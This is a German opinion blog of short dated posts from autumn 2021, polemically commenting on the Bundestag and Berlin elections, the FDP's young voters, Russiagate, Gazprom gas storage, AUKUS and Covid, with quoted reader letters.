Ein Citizen's Arrest ist wenn ein Passant einen fliehenden Taschendieb festhält, bis die Polizei da ist um ihn zu verhaften.
Wir haben es hier mit einem Reichsbürger zu tun, der vor Gericht dem Richter ins Gesicht sagte, er erkenne die Autorität seines Gerichts nicht an, und ihn zu "verhaften" versuchte. Wenig überraschend kam das nicht so gut an, wie er sich das vorher wohl ausgemalt hatte.
Das Konzept gibt es in Deutschland übrigens auch, nennt sich vorläufige Festnahme.

Sun Oct 3 2021

[l] Vor ner Woche ging die Story um, dass die CIA Pläne gemacht hat, wie sie Julian Assange entführen und/oder ermorden könnten.
Ich hab das nicht ins Blog getan, weil ich fand, dass das eh klar war. Das ist deren Job, Pläne zu machen.
Ich würde sogar soweit gehen zu sagen, dass Pläne noch nicht verwerflich sind. Sie umzusetzen ist verwerflich. Und bei umgesetzten verwerflichen Plänen gibt es bei der CIA eher wenig Knappheit, insofern schlage ich vor, die Empörung ab jetzt auf Dinge zu konzentrieren, die sie tatsächlich getan haben.
Wieso erwähne ich das jetzt doch im Blog? Weil es gerade eine Häufung von solchen Fällen gibt. Reportagen, die aufdecken, was eigentlich eh schon jeder wusste.
Klar, da kann man jetzt demonstrativ gähnen. Aber eigentlich, finde ich, sollten wir sowas sammeln. Unter der Kategorie "Verschwörungstheorien, die sich als wahr herausstellten".
Daher, jetzt hier, aus der beliebten Kategorie "Verschwörungstheorien, die sich als wahr herausstellten":
1. Die CIA hatte Pläne, Julian Assange zu entführen und/oder zu ermorden.
2. Pandora Papers: Politische Eliten verstecken ihr Geld im Ausland.
Aber es gibt noch eine andere Verschwörungstheorie, die hier Erwähnung finden sollte. Und zwar Russiagate. Das war die Idee, das die Russen ja den Trump fernsteuern. Die Nummer ist vor zwei Jahren schon dem FBI zwischen den Fingern explodiert, wo dann am Ende sogar jemand zugeben musste, den FISA-Court angelogen zu haben, um den Durchsuchungsbeschluss für einen Trump-Crony zu kriegen.
Der FISA-Court ist das geheim tagende Gericht, das im Verborgenen über geheim gehaltene Abhör- und Verwanzaktionen entscheidet (und dem Vernehmen nach noch nie einen Antrag abgelehnt hat). Ein Leuchtturm der Rechtsstaatlichkeit!
Wenn da also jemand lügen musste, um einen Durchsuchungsbeschluss zu erwirken, dann könnt ihr euch ja ausmalen, auf was für bröselnden Füßen die Nummer stand.
So, und jetzt? Jetzt haben sie einen von Hillary Clintons Anwälten angeklagt. Der hat damals die angebliche Russiagate-Story dem FBI gesteckt und dann aber darauf bestanden, dass er das rein als Privatperson tut. Obwohl seine Kanzlei die Kanzlei der Democrats ist. Die Untersuchung hat jetzt seine Rechnung gefunden, die er für seine Handlungen als "Privatperson" an die Clintons gestellt hat. LOL.
Da kann man also zusammenfassend sagen: Russiagate existiert wirklich und ist eine Verschwörung, aber nicht von den Russen gegen Donald Trump sondern von den Clintons gegen Donald Trump.
Na gut, sagt ihr jetzt vielleicht. Solange der Tipp zu Belegen geführt hat, die die Russen oder den Trump belasten, ist doch alles OK?
Hat er halt nicht. Das FBI hat sich das in Ruhe angeschaut und nichts davon bestätigen können. Das war schlicht eine Wahlkampflüge von Frau Clinton.
Ich bilde mir gerade ein, dass da noch ein Fall war. Fällt mir gerade nicht ein. Hänge ich dann an, wenn ich mich erinnere.

Thu Sep 30 2021

[l] Ich bin ein paar Mal gefragt worden, wieso ich nichts zum digitalen Führerschein im Blog hatte.
Nun, das Projekt war offensichtlich Bullshit. Eine PR-Luftnummer, das noch schnell vor der Wahl "fertig" werden musst, damit der Scheuer nicht NUR vollständiges Totalversagen vorzuweisen hat.
Als dann die ersten Details kamen, war völlig klar, dass das entweder hochwertige Satire ist oder nach ein-zwei Wochen unter dem Gewicht der eigenen leeren Versprechungen zusammenbrechen würde.
Genau das ist jetzt auch passiert. Ich trau mich gar nicht, das selbst zusammenzufassen, so fraktal verkackt ist das. Das überlasse ich mal meinem Kumpel Henryk, der daraus einen Aristocrats-Joke gemacht hat.
Lasst es mich auch mal probieren!
Was passiert, wenn in einer deutschen Behörde die Blockchain ausbricht?
Eine Weile lang gar nichts, dann ist die Blockchain voll. *badumm tss*
You had me at "Der Scheuer-Andi ist für Digitalisierung zuständig". Und es gab IMMER NOCH Leute, die CDU oder CSU gewählt haben! Nach Spahn und Scheuer!

Tue Sep 28 2021

[l] Ausreden der FDP-Erstwähler für ihr Tun.
Ich wäre mit sowas immer vorsichtig. Das menschliche Gehirn funktioniert so nicht. Es ist nicht so, im Allgemeinen jedenfalls, dass man sich vorher einen rationalen Plan macht, und dann nach dem Plan handelt, und danach auf Nachfrage den Plan wiedergibt.
Das Gehirn funktioniert so, dass man Dinge halt macht, und sich dann danach (auf Nachfrage oder ohne) eine Story zurechtlegt, warum man das jetzt wohl gemacht hat.
Die Ausreden haben ein klares Motiv, dass sich durch die alle durchzieht. Die haben der FDP geglaubt. Die FDP hat ihnen ins Gesicht gelogen, wie sie auch vorherigen Generationen ins Gesicht gelogen hat. Aber die Erstwähler wussten das halt nicht, denn hey, ist ja nur ne Zukunftswahl, wieso vorher informieren?!
Die Antworten sind alle ziemlich übel, aber die heftigste fand ich persönlich die hier:
"Ich habe die FDP (Zweitstimme) gewählt, weil ich der Meinung bin, dass es Zeit ist für einige Reformen. Vor allem im Hinblick auf der Digitalisierung und Rente."
Die Vollpfosten dachten, wenn sie FDP wählen, kriegen sie dickeres Internet! Damit es nicht so dämlich klingt, wie es ist, hängt dieser Typ noch Rente an. Alter, Rente? FDP? Ernsthaft? Die FDP hat jahrzehntelang alles getan, um das Rentensystem kaputtzumachen! Und das Krankenversicherungssystem! Alle Solidarsysteme, die sie finden konnten, haben sie kaputtgemacht!
Wie haben sie das gemacht? Sie haben dafür gesorgt, dass man sich auch für eine Privatversicherung entscheiden kann. Die Armen, die kein Geld für gesunde Ernährung haben, sind im Solidarsystem. Die Reichen, die Geld für Bioessen und Fitnessstudio haben, sind privat versichert. Die private Versicherung kann daraufhin viel günstiger anbieten, klar. Und die private Versicherung macht natürlich auch Verträge, die erst im Alter teuer werden. Warum? Weil die FDP dafür gesorgt hat, dass der zahnlose Regulierer das nicht verbietet.
Die meisten Leute haben gar nicht verstanden, was eine Solidarversicherung überhaupt ist! Die gehen da so ran: Ich hab soundsoviel eingezahlt, jetzt will ich aber auch soviel von denen ausgezahlt kriegen! Doktor! Verschreiben Sie mir mal was teures!!1!
"Legalisierung von Cannabis, kein Tempolimit und Digitalisierung."
Klar, die Spezies stirbt. Daher sind meine Prioritäten: Kiffen, Rasen und dickes Internet, damit die Pornos schnell laden! Da fragste dich doch, wie ein Erstwähler überhaupt ein Auto haben kann, bei dem das diskutierte Tempolimit eine Rolle spielt.
[l] Ich fragte gestern, ob man da vielleicht in der Schule den Kids beibringen sollte, was die Parteien so für Leichen im Keller haben.
Dazu kam folgender Leserbrief rein:
wie unschwer an der Absenderadresse zu erkennen, bin ich Lehrer. Sozialkundelehrer, so heißt das Fach hier in Rheinland-Pfalz. Du sprichst an, dass man den Erstwählern doch in der Schule mal näherbringen sollte, was für Leichen die Parteien so alle im Keller haben. Das sehe ich genauso. Aber wir haben dafür überhaupt keine Zeit. Hier in Rheinland-Pfalz haben Gymnasiasten 3 Jahre lang zwei Stunden pro Schulwoche Sozialkunde (mehr wenn sie Leistungskurs wählen). In der Zeit machen wir im Unterricht alles, was die Schüler in ihrer Schulzeit über Recht lernen (nicht viel), einen Großteil dessen, was sie über Wirtschaft lernen, alles, was sie über Soziologie lernen und dann eben noch Politik. Der Lehrplan ist dabei zum Beispiel so, dass Leute, die keinen Leistungskurs belegen, gar nichts über Einkommens- oder Vermögensverteilung lernen, das ist nur im Leistungskurs vorgesehen. Dazu muss ich aber was wissen, wenn ich die Politik der FDP beurteilen will. Ich packe dann ein paar Stunden dafür auch in den Grundkurs rein, aber dann kommt schon wieder etwas anderes zu kurz. In der Regel stehe ich vor der Wahl, ob ich zu einem Thema das Grundwissen vermittle oder ob wir das versuchen, kritisch zu hinterfragen. Wenn ich beides machen will, dann fällt wieder irgendwas komplett hinten runter. Und wenn ich nur die Kritik thematisiere, ohne die Grundlagen richtig bearbeitet zu haben, dann kommt auch nur oberflächlicher Unfug dabei raus. Letzten Endes bleibt es dann meistens bei den Grundlagen und vielleicht einem kurzen Ansatz von Kritik. Mir ist das selbst zu wenig, aber mehr geht mit dem Stundenansatz nicht. Ich hoffe dann immer, dass die Grundlagen vielleicht irgendwann dazu beitragen, dass die Schüler sich selbst ein kritisches Bild machen. Jetzt bei der Bundestagswahl war es so, dass ich es zwischen Ferien, sonstigem Stoff und Bundestagswahl meist gerade mal geschafft habe, ganz grundsätzlich auf die Programme der Parteien zu schauen und mal den Wahlomat gemeinsam durchzugehen, um einen groben Überblick über die aktuellen Themen zu bekommen. Da müsste man aber dann eigentlich erstmal zu jeder Frage eine Stunde Hintergrundwissen machen. So gut wie niemand auch in der Oberstufe weiß, was eine Fallpauschale ist oder welche Gründe für oder gegen Nordstream 2 sprechen. Nachdem zwei Kurse, mit denen ich weitgehend ohne große Kommentierung den Wahlomat gemacht hatte, sich mit klarer Mehrheit gegen eine Verteuerung von Flügen ausgesprochen hatten, habe ich mir mal den Spaß erlaubt, in zwei anderen Kursen jeweils nur kurz zu erwähnen, dass Kerosin weniger besteuert wird als Benzin. Zack, klare Mehrheit für eine Verteuerung. Die Schüler sind einfach bei den meisten Themen noch uninformiert, was ein Grund für die Attraktivität der oberflächlich erstmal einfach und logisch erscheinenden Vorschläge etwa der FDP sein kann. Und wir sind, ehrlich gesagt, in der Schule nicht in der Lage, das wesentlich zu verbessern, so mein Eindruck. Immerhin haben sich auch alle Gruppen gegen ein Wahlrecht ab 16 ausgesprochen, etwas Selbstreflexion ist also da...auch wenn ich eine Absenkung des Wahlalters aus anderen Gründen eigentlich gut fände. Dann aber bitte mit doppelt so viel Politikunterricht in der Schule. Weiß allerdings auch nicht, was ich dafür weglassen würde.
Mir müsste ja auch nochmal jemand erklären, wieso wir eigentlich 13 Jahre auf 12 Jahre gekürzt haben für das Abitur. Das war doch auch mal wieder so eine FDP-Aktion. Wir brauchen mehr uninformierte Teenager, die sich mangels Erfahrung von unseren Hyänen über den Tisch ziehen lassen. Eine andere Erklärung fällt mir jedenfalls nicht ein.

Mon Sep 27 2021

[l] Leserbrief zu FDP und den Erstwählern:
Was hier vielleicht untergeht, ist wie die Erstwähler überhaupt auf die FDP aufmerksam geworden sind. Die FDP hat auf den verschiedenen Social Media Plattformen (bei mir Instagram) die letzten Tage vor der Wahl massiv und gezielt Werbung geschaltet. Ich habe innerhalb von drei Tagen zwischen 10 bis 20 Mal Werbung bekommen. Ich habe mich hierzu mit meinem persönlichen Umfeld ausgetauscht und alle haben meine Erfahrungen bestätigt oder sehr ähnliche gemacht. Anscheinend auch über das gesamte politische Interessensspektrum meines Freundeskreises. Ich würde mich auch grundsätzlich als liberal bezeichnen, würde aber nicht die FDP wählen. Die gezielte Werbung und die durchaus für die jüngere Generation wichtigen Punkte z.B. wie die Bildungsreform angegangen werden muss, hätten mich auch fast noch überzeugt.
Von anderen Parteien habe ich auf diesem Weg auch Werbung erhalten, aber die Intensität und Medienkompetenz wie bei der FDP hat keine andere Partei erreicht.
Also Medienkompetenz wäre jetzt nicht der Begriff gewesen, den ich dafür benutzt hätte, aber ... sei's drum.
Eigentlich muss man ja mal die Frage stellen, inwieweit die Schulen eigentlich in der Pflicht sein sollten, den Erstwählern mal erklärt zu haben, was für Leichen die ganzen Parteien im Keller haben.
Ich erinnere mich an meinen Schulunterricht, da gab es ein Fach "Politische Weltkunde", das da allerdings ein Weltbild vermittelt hat, in dem die Parteien ehrlich und gut sind und deren Versprechen im Wesentlichen vertrauenswürdig sind.
Da bräuchte man halt mal eine Veranstaltung für. Vielleicht könnte man zwei Phasen machen. In der ersten Phase machen alle Parteien eine Liste mit den Vorzügen ihrer Partei und den Vorwürfen gegen die anderen Parteien. In der zweiten Phase dürfen die Parteien sich gegen die Vorwürfe der anderen verteidigen.
Am besten hat man dann noch mal einen neutralen Faktencheck des Lehrers, soweit das möglich ist.
[l] Covid hat in einigen Ländern die Lebenserwartung um mehr als ein Jahr reduziert und damit den Fortschritt rückgängig gemacht, den man in vielen Jahren erarbeitet hatte.
Pandemic behind biggest fall in life expectancy in western Europe since second world war, say researchers
Ach komm. Wir glauben nicht an menschengemachten Klimawandel, wieso würden wir hieran glauben? Einfach ein bisschen ~~Hydroxychloroquine schnupfen~~ ~~Ivermectin spritzen~~ Jodlösung gurgeln, dann ist alles wieder gut. In der Bibel steht nichts von Covid, das muss Fake sein.
So und jetzt bauen wir schnell noch ein paar Kohlekraftwerke. Bevor die Verbotspartei die Macht übernimmt.

Sun Sep 26 2021

[l] OK die ersten Hochrechnungen kommen rein und das sieht ja mal heftig aus.
Ein Blutbad, geradezu. CDU ist so abgestürzt, das nicht mal eine große Koalition mit der SPD klar über 50% liegt. Linke sind abgestürzt und nur noch bei 5%. Grüne bei 15%. Wenn niemand mit der AfD koalieren will, gibt es nur relativ wenige Optionen. Die Linken sind so tief gesunken, dass sie nicht mal rechnerisch für irgendwelche Koalitionen eine Rolle spielen. FDP und Grüne haben zusammen 26% und könnten damit SPD oder CDU zur Regierung verhelfen.
Die wären damit in der perfekten Position, um Bedingungen zu diktieren. Das kann ja nur ganz doll furchtbar werden, wenn die FDP irgendwas diktieren kann.
Und die Berlin-Wahl ist noch krasser. Da ist im Moment völlig überraschend nicht die Franziska "Clankriminalität" Giffey in Führung sondern ... die Grünen!? Ich musste erstmal googeln, wen die überhaupt als Kandidaten für den regierenden Bürgermeister aufgestellt haben. Bettina Jarasch. Die ist mir bisher noch nicht negativ aufgefallen und ist mir damit auf jeden Fall schon mal deutlich lieber als Giffey. Vielleicht ist da tatsächlich ein großer Kelch an uns vorbeigegangen. Boah fällt mir da gerade ein Stein vom Herzen!
Dafür wird die Bundespolitik in den nächsten Jahren eine riesige Shitshow. Die Grünen schätze ich so ein, dass sie sich auf allen Fronten runterhandeln lassen. Aber der Lindner?! Der wird die Politik in unserem Lande die nächsten Jahr bestimmen und das Land mit Anlauf gegen die Wand fahren. Viel schlechter hätte das kaum ausgehen können. Da wäre mir im Moment sogar eine weitere "große" Koalition lieber.
Na ich hoffe mal auf die Briefwahlstimmen. Noch geht da einiges. Aber ich fürchte: Nicht genug, um den Lindner zurück in seine Krypta zu kriegen.
Meine Hoffnung für den Bund wäre im Moment eine "große" Koalition als Minderheitsregierung.
Mir kommt gerade der Gedanke, dass das schlechte Abschneiden der SPD in Berlin was mit diesem Wohnungsrückkauf zu tun haben könnte, den die noch schnell gemacht haben, um die Linken auszubooten. Darauf konnten die Briefwähler nicht mehr reagieren, aber die anderen halt schon. Das war so eine typische SPD-Aktion. Nicht geplant, schlecht ausgeführt, mit anderer Leute Geld Schulden gemacht und Verpflichtungen eingegangen. Schlimmer kann das eigentlich nur noch die FDP.
Die übelste Grafik, die ihr heute sehen werdet, ist Folie zwei dieser infratest-dimap-Umfrage. Die wollten wissen: Ich fände es gut, wenn diese Partei an der nächsten Bundesregierung beteiligt wäre. Ergebnis: FDP 57%, Grüne 55%, Linke 28%. Wie meinen?!? Die fucking FDP wollt ihr an der Regierung sehen? Seit ihr meschugge?!
Die FDP will, dass der Markt eure Mieten regelt. Willkommen in der Obdachlosigkeit. Die Tafeln sind dahinten links (die findet die FDP übrigens total großartig, die Tafeln!)
Die FDP würde gerne die Armen mehr besteuern und das Geld den Reichen geben. Nein, du bist nicht reich. Aller Wahrscheinlichkeit nicht. Mit der FDP in der Regierung wirst du auch in Zukunft nicht reich werden.
Und wie die FDP zur Klimakatastrophe steht, hatten wir ja auch schon geklärt. Lindner hofft, dass uns eine gute Fee besucht, oder eine fortschrittliche Alien-Rasse. Die kann uns dann ja Baupläne für die magische CO2-Absauganlage da lassen, die uns alle retten wird. Bis dahin müssen wir den Markt das regeln lassen. Weniger Regulierung, mehr persönliche Freiheit. Wer kam eigentlich auf die Idee, Umweltverschmutzung zu verfolgen?! Scheiß Verbotsparteien immer!!1!
Geil und im Fernsehen faselt Laschet was vom Linksruck, während unten durchscrollt: Linke: 5%
[l] Alter Falter, laut RBB-Ticker ist die Situation noch viel kaputter als eh schon angenommen.
Berlin hat gerade eine verschärfte Situation, weil es da sechs Kreuze auf fünf Zetteln gibt. Aber zusätzlich haben sie einen Marathon zugelassen, d.h. es gab Straßensperrungen.
Aber die Liste der Dinge, die der rbb da berichtet ... weia! In Spandau ist ein Wahlbüroleiter einfach nicht erschienen. In Mitte kamen sie in ein Wahllokal nicht rein. Softwarefehler bei der Schließanlage. In Friedrichshain hatten sie die falschen Wahlzettel. In Charlottenburg hatten sie gar keine Wahlzettel.
Wat?!
Das liest sich alles wie eine Satire der letzten Jahre in der Sowjetunion! Was machen die eigentlich alle beruflich?
Mir schrieben jetzt noch andere Wahlhelfer, dass auch ihr Wahllokal die Unterlagen erst ein paar Minuten vor Öffnung des Wahllokals gekriegt hat.
Ich habe mich hier jahrelang über die Zustände in den USA lustig gemacht, mit den Schlangen vor den Wahllokalen. Und jetzt haben wir das hier auch. Wow.
Das ist ja mal ein bitterer Absturz.
[l] Sagt mal, was passiert eigentlich, wenn man Luftfilter in Krankenhäusern aufstellt?
Ich meine, so wegen Covid und so.
Könnte man doch mal machen. Und dann gucken, was alles im Filter hängengeblieben ist.
Hier hat das mal jemand gemacht und ein Paper geschrieben.
Ergebnis: Ja, findet Covid in der Luft. Findet auch ein Dutzend anderer Erreger. Pilze. e.coli und e.faecalis. Herpes. Grippe. Staphylokokken. P. Mirabilis ist ein Erreger für Harnwegserkrankungen.
Iiiiiih! Vielleicht ab jetzt auch im Krankenhaus lieber nur mit Maske. *göbel*

Thu Sep 23 2021

[l] Zu der Gazprom-Meldung kamen eine Reihe von Mails rein. Die meisten haben vermutet, dass das eine Medienkompetenzübung war.
Leute, an dieser Stelle nochmal ganz langsam für die nicht so schnellen unter euch: ALLES ist bei mir eine Medienkompetenzübung. Manchmal geplant, manchmal nicht.
Aber zurück zu Gazprom. Die Meldung war: Die Gasspeicher sind leer und Gas ist teuer. Die Meldung kam von der Deutschen Welle.
Der erste Teil der Medienkompetenzübung wäre gewesen, sich an das Selbstverständnis der Deutschen Welle zu erinnern. Wir sind ein Propaganda-Outlet, dessen Aufgabe es ist, Putins Propaganda Paroli zu bieten. Also: Mehr Propaganda verbreiten, aber halt in die Gegenrichtung.
Falls euch nicht aufgefallen ist, was die Deutsche Welle daraufhin so für Propaganda rausgehauen hat: Hier war ein schönes Beispiel zum Putsch in der Ukraine, und hier haben sie aktiv Wahlmanipulation in Russland gemacht.
Wenn es also einen Sender gibt, dem man Meldungen über Russland nicht einfach so glauben kann, dann der Deutschen Welle.
Aber wartet, das war noch nicht die Übung.
Medien lügen ja normalerweise nicht. Die Fakten stimmen schon. Manipulation funktioniert auf anderen Ebenen (gut, außer wir reden von plumpen Pfuschern wie bei der "Bild", die lügen auch einfach mal). Die meisten manipulativen Medien haben Angst davor, beim Lügen erwischt zu werden. Also manipulieren sie nicht dadurch, dass sie sagen, Gazprom hätte zu wenig geliefert. Das stimmt dann schon. Allerdings ist "zu wenig" ja eine subjektive Äußerung. Was heißt das genau? Weniger als wir abgenommen hätten? Weniger als wir brauchen? Weniger als wir bestellt haben? Gucken wir doch mal, was DW konkret behauptet:
Der russische Staatskonzern liefert viel weniger Gas in die EU, als er könnte.
A-Ha! Sie lügen also nicht, dass Gazprom weniger als vereinbart liefert. Sie versuchen nur, beim Leser diesen Eindruck entstehen zu lassen. So funktioniert Manipulation.
Was behaupten sie denn noch?
Nach einem langen und kalten Winter sind die Erdgasspeicher ungewöhnlich leer
Was ist hier der entstehende Eindruck? Die EU betreibt Speicher, Gazprom füllt die, und die sind jetzt alle, weil Gazprom zu wenig geliefert hat.
Was ist tatsächlich passiert? Gazprom hat Speicher. Nicht die EU. Gazprom. Wir haben sie ihnen verkauft. Wieviel Gas durch die Pipeline fließt ist also überhaupt nicht unsere Angelegenheit. Gazprom hat Verträge mit uns, und solange die zugesagte Menge Erdgas aus dem Lager und der Pipeline geliefert wird, erfüllen sie die Verträge.
OK, na, äh, liefert Gazprom denn weniger als versprochen? Nein, tun sie nicht!
"Gazprom erfüllt seine Lieferverträge", sagte Hermes.
So, warte mal. Was ist denn dann hier die Story gerade? Wieso sind die Lager dann alle? Na weil wir mehr davon entnommen haben!
Warum haben wir das gemacht? Ihr müsst jetzt sehr tapfer sein!
Russisches Pipelinegas sei aktuell deutlich günstiger als Gas auf dem Spotmarkt
Ach. Ach was. Ihr ahnt sicher schon, wo die Geschichte hingeht. Gazprom hat da Speicher mit billigem Erdgas, weil wir langfristige Lieferverträge mit denen haben. Der Marktpreis von Erdgas geht aber hoch. Da gibt es ja eigentlich nur zwei Erklärungen für:
1. Fiese Spekulanten kaufen das Erdgas billig und bunkern es, um es uns dann für teure Spotmarktpreise zu verkaufen.
2. Fiese Geschäftemacher verkaufen das für uns gedachte billige russische Gas z.B. nach Asien weiter.
Könnt ihr euch jetzt auswürfeln, welche davon ihr für weniger schlimm haltet. Eine Sache ist jedenfalls klar. Wenn jemand an der gesamten Sache völlig unschuldig ist, dann ist es Gazprom.
So, haben wir jetzt alles verstanden? Nein! Es gibt da noch mehr Details. Und zwar gehören Gazprom zwar die Lager, aber sie betreiben nur die Infrastruktur.
Gazprom Germania hält sich bei der Frage nach den Gründen für den weitgehend leeren Speicher Rehden bedeckt. Ein- und Ausspeichermengen erfolgten durch die Kunden, teilte ein Sprecher auf Anfrage mit. »Daher können wir auch nicht prognostizieren, wie die Entwicklung in der Zukunft aussehen wird.«
A-Ha! So langsam wird da doch ein Schuh draus, meint ihr nicht? Es ist also nicht so, dass Gazprom zu wenig geliefert hat, sondern dass ihre Kunden (ich nehme an damit sind RWE und co gemeint) da einfach alles rausgelutscht haben, was sie kaufen konnten, weil es dort billiger als auf dem Weltmarkt zu haben war. Und die heulen jetzt rum, dass Gazprom ihnen nicht noch mehr Erdgas unter Marktpreis verkaufen will.
So, wissen wir denn jetzt alles? Nein, gibt noch ein Detail:
So hätten »die Annahmen des Marktes zur weiteren Entwicklung der Preise dazu geführt, dass in der bisherigen Einspeisesaison weniger Gas eingelagert wurde«, sagt ein Sprecher des Düsseldorfer Energiekonzerns Uniper, der über die größte Speicherkapazität in Deutschland verfügt, die derzeit zu etwa 88 Prozent gefüllt ist.
Den Satz müsst ihr euch mal auf der Zunge zergehen lassen. Der Typ betreibt ein Lager, das zu 88% voll ist. Das Gazprom-Lager ist bei 5%. Und der erzählt uns jetzt: Der Markt nimmt an, dass der Gaspreis demnächst krass fallen wird, daher kauft niemand jetzt teuer und lagert das ein. Sagt er uns. Hat aber selber 88% Füllstand. Da könnt ihr ja selber mal drüber nachdenken, wie ihr da eine sinnvolle Interpretation findet.
Oder warte, meint er damit vielleicht nur das Gazprom-Lager? Sagt er uns hier, dass der Markt sieht, dass Gazprom-Gas billig und anderes Gas teuer ist und daher entnimmt man es aus dem Lager und verkauft es schnell meistbietend? Das würde Sinn ergeben!
Wartet, einen hab ich noch. Versetzt euch mal in die Lage von Gazprom. Aus deren Sicht ist es ja egal, ob sie uns die vereinbarte Gesamtmenge jetzt liefern, oder über den Winter verteilt. Gleiche Lieferung unterm Strich, gleiche Bezahlung. Aber was passiert, wenn Gazprom jetzt alles geliefert hätte und das nicht bremst? Daran können wir erkennen, was Gazprom glaubt, was hier passiert. Dann verkaufen unsere Spekulanten oder Geschäftemacher das Gas nach Asien weiter, machen einen fetten Reibach, und das Heiz-Erdgas muss dann teuer auf dem Spotmarkt gekauft werden. Das können sich viele Leute nicht leisten, die frieren dann. Wer kriegt den Ärger ab? Gazprom. Gazprom ist jahrzehntelang von der Ukraine und Polen bestohlen worden. Die kennen das Spiel. Die wissen, wie das ausgeht. "Unsere armen Bürger frieren!!!"
Wenn Gazprom also jetzt nicht mehr als vereinbart liefert, dann tun sie damit indirekt alles was sie tun können, damit hier im Winter niemand erfrieren muss. Natürlich kann Gazprom nicht verhindern, dass unsere Energiemafia uns trotzdem über den Tisch zieht, und wenn ihr kurz auf die Gaspreise guckt, dann seht ihr: Genau das passiert gerade. Obwohl die billig von Gazprom einkaufen können, erzählen sie uns was von steigenden Erdgaspreisen und erhöhen ihre Endkundenpreise.
Wartet, gibt noch ein Wärzchen an der Geschichte. Die Dimensionen der Abzocke. RT sagt, die Verträge mit Gazprom sind über 220 Euro pro pro 1000 Kubikmeter. Der Spotmarktpreis hat gerade die 1000-Dollar-Marke gerissen.
Nicht nur zockt uns also hier nicht Gazprom ab gerade. Gazprom sind die einzigen, deren Verhalten darauf ausgelegt zu sein scheint, bei uns im Winter auch für die Ärmeren Heizen erschwinglich zu halten.
Wie kann denn das sein, wenn wir alles Gas, das wir brauchen, billig von Gazprom kriegen, dass dann der Spotmarktpreis über 1000 Dollar steigt?
Tja, das liegt an der Gasmarktliberalisierung. Der Wikipedia-Artikel ist recht lang und listet auf, wie fraktal verkackt und schädlich für die Kunden das alleine in den ersten Jahren war. Wie ihr seht ist das nicht besser geworden seit dem. Bedankt euch mal bei den Markt- und Deregulierungsfetischisten von CDU und FDP.
Oh aber ja! Selbstverständlich war es mal wieder die CDU, die die politische Verantwortung trägt! Was habt ihr denn gedacht? Aber hey, ist ja bald Wahl.

Wed Sep 22 2021

[l] Oh mir fällt gerade nochwas auf zu dem AUKUSA-Militärpakt. Das betrifft Frankreich gleich doppelt.
Einmal Australien und die U-Boote, klar.
Aber die Franzosen hatten auch mit den Briten einen Deal gemacht, dass deren Streitkräfte zumindest partiell zusammengelegt wurden. Also jedenfalls eine über das normale Nato-Maß hinausgehende Kooperation.
Da muss das ja nochmal besonders schmerzen, wenn die Briten dann eine Spezialsonderallianz mit den Amis eingehen und vorher den Franzosen nicht Bescheid sagen.
Kurze Durchsage von Boris Johnson dazu:
Boris Johnson has reopened the war of words with Paris over the Aukus defence and security deal, urging the French to “prenez un grip about all this and donnez-moi un break”.
Was für ein Muppet. Aber wartet, geht noch weiter.
“Because this is fundamentally a great step forward for global security. It’s three very like-minded allies standing shoulder to shoulder creating a new partnership for the sharing of technology. It’s not exclusive. It’s not trying to shoulder anybody out. It’s not adversarial towards China for instance.”
Oh, ach? Not exclusive? Wenn ihr nicht mal Kanada und Neuseeland aus den Five Eyes reingenommen habt?
Und not adversarial towards China? Das glauben die ja wohl hoffentlich selber nicht, dass ihnen das jemand abnimmt. Schon gar nicht die Chinesen.
[l] Mein Kumpel Maha hat für seinen Klabautercast ein paar Folgen zu den Klimaprogrammen der verschiedenen Parteien aufgenommen. Obwohl die individuellen Podcast-Folgen jeweils über drei Stunden lang sind, gehen die dabei so in die Tiefe, dass sie pro Partei eine Folge gemacht haben:
1. Klimaliste. Das ist sozusagen die Expositionsfolge, denn die Expertin in den anderen Folgen ist Aktivistin bei der Klimaliste, die lokal in Berlin antritt. Beim Vergleich geht es dann aber um die Bundespolitik, weshalb man das so sehen kann, dass hier kein Interessenskonflikt vorliegt. Müsst ihr entscheiden, wie ihr das seht.
2. Bündnis 90/Die Grünen.
3. SPD.
4. Die Linke
5. AfD und Freie Wähler.
6. FDP, Piratenpartei, Volt.
7. CDU/CSU.
8. ÖDP, Humanisten, Tierschutzpartei und Die PARTEI
[l] Ich bin übrigens nicht der einzige, der den Eindruck hat, die CDU verkacke gerade absichtlich. Ein Leser hat diese Analyse eines CDU-Wahlspots gefunden, die im Wesentlichen zum selben Schluss kommt.
Update: Ich bin mir ja nicht sicher, ob der Typ da in dem Video weiß, wovon er spricht. Das ganze Ding wirkt überhaupt wie eine Dauerwerbesendung.
Update: Glaubt auch folgender Leserbrief:
Keine Ahnung, was der gute Herr für ein Professor ist, aber Semiotiker ist er garantiert nicht. Er kommt in dem Video nämlich zu den völlig falschen Schlüssen für den CDU-Spot. Ein Desaster von vorne bis hinten? Mitnichten, der Clip ist extrem gut gemacht (und ich bin beileibe kein CDU-Freund, ganz im Gegenteil):
Man sieht Laschet in einer Zeche und er sagt, dass sein Vater Kumpel war (=ich bin ein Mann des Volkes); Laschet sagt, er habe die letzte Zeche geschlossen (=er macht was im Gegensatz zu anderen – was durch den Kohlenstaub untermalt wird, der nur in seinem Gesicht ist). Dann gibt es den Teil mit der Digitalisierung und der Stimme aus dem Off (=Sprachebene) und das Video mit den Senioren und der Schule (=Bildebene). Da das Gesagte hier aus dem Off kommt, wird die Bildebene in den Vordergrund gerückt (kennt man von Tierfilmen). Das ist bei Weitem kein Fehler, ich denke, es ist sogar intendiert: Die Sprachebene bietet nur die üblichen Allgemeinplätze und politischen Schlagworte, von denen der potenzielle CDU-Wähler mal gehört hat und weiß, das sie „wichtig“ sind. Die Bildebene suggeriert aber etwas viel wichtigeres für Konservative: „Mit uns bleibt alles, wie es ist“.
Auch das Ende finde ich nicht falsch. "Ich bin Armin Laschet ... und ich weiß, dass wir das können": Eindrucksstelle, Spannungsbogen, Ausdrucksstelle.
Der Text vor schwarzen Hintergrund ist ja wohl klar. Schwarz = Farbe der CDU. Und hier wieder: schwarzer Text, dann CDU-Logo auf weißem Hintergrund: Eindrucksstelle, Ausdrucksstelle. Was suggeriert werden soll ist wohl: von der Dunkelheit ins Licht dank der CDU.
Es ist doch klar, dass Leute, die die CDU doof finden, ihre Spots auch doof finden. An diese Leute ist der Spot aber nicht gerichtet (siehe auch 2. Kommentar unter dem Video). Stelle Dir einfach für einen Moment mal vor du wärst potenzieller CDU-Wähler (*Schauder*) und dann schaue Dir den Clip in diesem Kontext noch mal an.

Tue Sep 21 2021

[l] Zerstörungsvideos sind ja gerade im Trend, da konnte sich auch Martin Sonneborn nicht zurückhalten und hat ein EU-Zerstörungsvideo gemacht. 30 Minuten, die sich lohnen. (Danke, Jens)

Sun Sep 19 2021

